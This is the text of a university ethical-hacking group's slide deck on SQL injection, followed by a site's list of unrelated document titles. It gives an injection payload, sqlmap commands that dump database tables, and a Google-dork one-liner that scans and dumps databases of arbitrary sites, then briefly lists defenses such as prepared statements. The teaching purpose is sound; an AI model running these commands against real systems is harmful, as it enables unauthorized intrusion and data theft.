Upload File

sql injection - ucm · via a dictionary-based attack=n,do you want sqlmap to try to detect backend...

  • Home
  • Documents
  • SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with
14
HACKING WEB SQL Injection FDIst: Grupo de Hacking Éco de la FDI

Upload: others

Post on 19-Apr-2020

7 views

Category:

Documents


0 download

Report

TRANSCRIPT

Page 1: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

HACKING WEB

SQL Injection

FDIst: Grupo de Hacking Ético de la FDI

Page 2: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

Page 3: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

DISCLAIMERF

DIs

t -

HA

CK

ING

WE

BS

QL

INJE

CT

ION

In no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the knowledge provided.

Page 4: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

¿Qué es?F

DIs

t -

HA

CK

ING

WE

BS

QL

INJE

CT

ION

Page 5: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

La magia de SQL InjectionF

DIs

t -

HA

CK

ING

WE

BS

QL

INJE

CT

ION

' OR 1 = 1; --

Page 6: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

La magia de SQL InjectionF

DIs

t -

HA

CK

ING

WE

BS

QL

INJE

CT

ION

Page 7: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

¡Atacad!

https://vulnerable.devpgsv.com/

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

https://vulnerable.devpgsv.com/
Page 8: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

Automatizando

● SQLNinja● The Mole● SQLBrute● SQLMap

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

Page 9: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

SQLMap

sqlmap -u [URL]

sqlmap -u [URL] --dbs

sqlmap -u [URL] -D [DATABASE] --tables

sqlmap -u [URL] -D [DATABASE] -t [TABLE] --columns

sqlmap -u [URL] -D [DATABASE] -t [TABLE] --dump

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

Page 10: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

SQLMap

sqlmap -g 'inurl:".php?id="' --dbs --dump-all --exclude-sysdbs --answers="follow=N, want to skip test payloads specific for other DBMSes=Y, want to include all tests for 'MySQL'=N,do you want to test this URL=Y,is vulnerable. Do you want to keep testing the others=N,want to exploit this SQL injection=Y,store hashes to a temporary file=N,crack them via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with a random integer value for option=Y,due to huge table size do you want to remove ORDER BY clause gaining speed over consistency=Y" --threads=10

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

Page 11: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

Database InjectionF

DIs

t -

HA

CK

ING

WE

BS

QL

INJE

CT

ION

Page 12: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

SoluciónF

DIs

t -

HA

CK

ING

WE

BS

QL

INJE

CT

ION

● Escapar caracteres● Filtros● Prepared Statements

Page 13: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

FDIst

@FDIstUCM

https://t.me/joinchat/Ar4agkCACYELE5TZ5AWtAA

https://fdist.fdi.ucm.es

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

https://twitter.com/FDIstUCM
https://t.me/joinchat/Ar4agkCACYELE5TZ5AWtAA
https://fdist.fdi.ucm.es/
Page 14: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with

This work is licensed under a

Creative Commons Attribution-ShareAlike 4.0 International License

.

Pablo García de los Salmones ValenciaFebrero 2018

FD

Ist

- H

AC

KIN

G W

EB

SQ

L IN

JEC

TIO

N

https://creativecommons.org/licenses/by-sa/4.0/
https://creativecommons.org/licenses/by-sa/4.0/
https://creativecommons.org/licenses/by-sa/4.0/

Want To Improve Your Carpet Through Carpet Cleaning? Try These Tips

Want to try some of this code? Clone this repo to set up a

try try try

From Gasoline to Ethanol Direct Injection Engines · 2012. 10. 4. · Direct injection offers features to make happen what we want to happen. This needs efforts • in enhancing injector

onmyrandommind.files.wordpress.com · 2017-01-04 · saying, "I want to be powerful," say "1 want to own my own business." Or rather than "I want to look great," try "I want to lose

If you want to truly understand something, try to change it

Who’d want to spend life on a shelf anyway?. Try this first…

SQL Injection Attacks - cse.dmu.ac.ukmjdean/notes/modules/programmin…  · Web viewSQL Injection Attacks. The idea behind all forms of injection attack is to try and make our own

Want To Give Back To Your Community But Don't Know How? Try These Ideas

defy any yoifer who to want to try them!archive.lib.msu.edu/tic/golfd/page/1932apr71-80.pdf · defy any yoifer who to want to try them! With these clubs in your shop you can rely

Intake Manifolds • Harmonic Dampers • Fuel Injection ... · • Intake Manifolds • Harmonic Dampers • Fuel Injection ... If you want to run nitrous with the injectors mounted

Get the Salary You Want - Try Out These 7 Best Ways For Salary Negotitation

Want a tenure?: try a startup - Baqai Medical Universitybiit.baqai.edu.pk/bdl/books/ACMMagzinesArticles/want a... · 2017. 1. 24. · Want a Tenure? Try a startup Why running a startup

WHAT SHOULD I EAT?!...or want to try: Green foods I like or want to try: Green foods I like ... We’ve given you some ideas to get started. But YOU know best what works for you. Sustainable

Summary: What You Need - GSKSMO · PDF fileSummary: Want to fly a plane? Lead a rock band? Win Olympic Gold? Or maybe you have another big role you want to try! aMUSE lets you try

Try Different Patterns Of Skirts If You Want To Get Noticed

“If you want to make enemies, try to change something” – Woodrow Wilson

Click here to listen to video. Hieroglyphics Try it your self Rosetta stone Pictures Want more info

If you want to get noticed fast, try starting high school threecjlyons.net/wp-content/uploads/Broken_excerpt.pdf · 2016. 12. 21. · I f you want to get noticed fast, try starting

SQL Injection Attacks - tech.dmu.ac.ukmjdean/notes/modules...  · Web viewSQL Injection Attacks. The idea behind all forms of injection attack is to try and make our own unauthorised

MLA 2013: "Managing the Mayhem of Your Position: Tools You'll Want to Try!"

What is a wireframe? What features are important? Which wireframe tools might you want to try?

Teaching in Inclusive Classrooms “If you want to truly understand something, try to change it.” Kurt Lewin

Want Effective Risk Control? Try Agile!

From Gasoline to Ethanol Direct Injection Engines · Direct injection offers features to make happen what we want to happen. This needs efforts • in enhancing injector spray formation

Want To Try The Best Chicken? – Try for Oklahoma’s Best Chicken

CPSC 340: Machine Learning and Data Miningfwood/CS340/lectures/L17.pdfMy advice if you want the “relevant” variables. •Try the association approach. •Try forward selection

“I WANT TO TRY AND TRY”: INCREASING ACHIEVEMENT …

S.M.A.R.T Goal - mrsdooleykindergarten.weebly.commrsdooleykindergarten.weebly.com/.../martin.faporfolio_(compressed).d…  · Web viewS.M.A.R.T Goal. I want to try using two different

Want Peace? Try These 4 Outdoor Sports in Groups

“We Try to Create the World That We Want”

Want to Know More - Michigan...Want to Know More? • Try a new type of hunt • Try a new location • Mentor a new hunter • Show support for local businesses • Travel across

Want Information About Heating and cooling? Try to find Great Idea Here!

Try These 7 Natural Remedies If You Don't Want Muscle Pain!

FAVORITES€¦ · Tech Gadget I Want: Music Genre: Musical Artist: Book I Want to Read/ Movie I Want to See: FAVORITES Is there something you’ve always wanted to try? ITEMS ON MY